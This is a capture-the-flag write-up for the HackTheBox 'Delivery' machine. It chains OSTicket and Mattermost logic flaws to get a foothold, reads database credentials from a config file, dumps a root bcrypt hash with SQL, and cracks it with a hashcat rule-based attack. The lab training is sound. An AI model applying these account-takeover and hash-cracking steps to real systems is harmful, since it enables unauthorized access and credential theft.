Delivery (Easy)
{"author": ["ret2basic"]}

Summary

Delivery is a beginner-friendly box that does not require a lot of technical skills to solve. The foothold is about chaining logic flaws between OSTicket and Mattermost. The privesc is hashcat rule-based attack, based on a hint offered when getting the foothold.

Nmap

Nmap

Enumeration

Port 80

The "Contact Us" page has two links:
Contact Us
To access these two links, edit /etc/hosts:
1
# HackTheBox
2
10.129.127.121 delivery.htb
3
10.129.127.121 helpdesk.delivery.htb
Copied!

Foothold: Chaining Logic Flaws

In summary, the chain is:
    1.
    Create a ticket on OSTicket and get a @delivery.htb email address
    2.
    Register an account on Mattermost using the @delivery.htb email address
    3.
    Go back to OSTicket and abuse the "Check Ticket Status" feature to get the activation link from Mattermost
Grab the activation link:
Activation link
Enter Mattermost:
Mattermost
Here we learn that the credential is maildeliverer:Youve_G0t_Mail!. The comment on hashcat is the hint for privesc.
Login as the maildeliverer user through SSH:
maildeliverer

Privesc: hashcat Rule-based Attack

Search for Mattermost directory:
1
[email protected]:~$ find / -name mattermost 2>/dev/null
2
/opt/mattermost
3
/opt/mattermost/bin/mattermost
4
/var/lib/mysql/mattermost
Copied!
In /opt/mattermost/config/config.json, we learn a SQL credential mmuser:Crack_The_MM_Admin_PW:
config.json
The password itself is also a hint. Login as mmuser through mysql:
1
$ mysql -u mmuser -p
Copied!
The Users table from the mattermost database contains usernames and passwords:
Database
Dump the password of root:
1
MariaDB [mattermost]> SELECT Password from Users where Username="root";
2
+--------------------------------------------------------------+
3
| Password |
4
+--------------------------------------------------------------+
5
| $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
6
+--------------------------------------------------------------+
7
1 row in set (0.001 sec)
Copied!
Identify hash type:
Hash analyzer
bcrypt hashes correspond to 3200 in hashcat:
bcrypt
Remember the hint from the Mattermost comment? Here we should use PleaseSubscribe! as wordlist and conduct the hashcat rule-based attack. hashcat documentation says:
The rule-based attack is one of the most complicated of all the attack modes. The reason for this is very simple. The rule-based attack is like a programming language designed for password candidate generation. It has functions to modify, cut or extend words and has conditional operators to skip some, etc. That makes it the most flexible, accurate and efficient attack.
This idea is very similar to mutation in fuzzing.
The hashcat rules are located in /usr/share/hashcat/rules. For this box, we use best64.rule:
1
$ echo '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' > hash.txt
2
$ echo 'PleaseSubscribe!' > wordlist.txt
3
$ hashcat -a 0 -m 3200 hash.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule -o password.txt
Copied!
The flags in the hashcat command represents:
    -a 0: set attack mode to "dictionary attack"
    -m 3200: set hash type to bcrypt
    -r /usr/share/hashcat/rules/best64.rule: use best64.rule to conduct rule-based attack
    -o password.txt: save the output to password.txt
Once the password is cracked, switch to the root user:
root
Last modified 2mo ago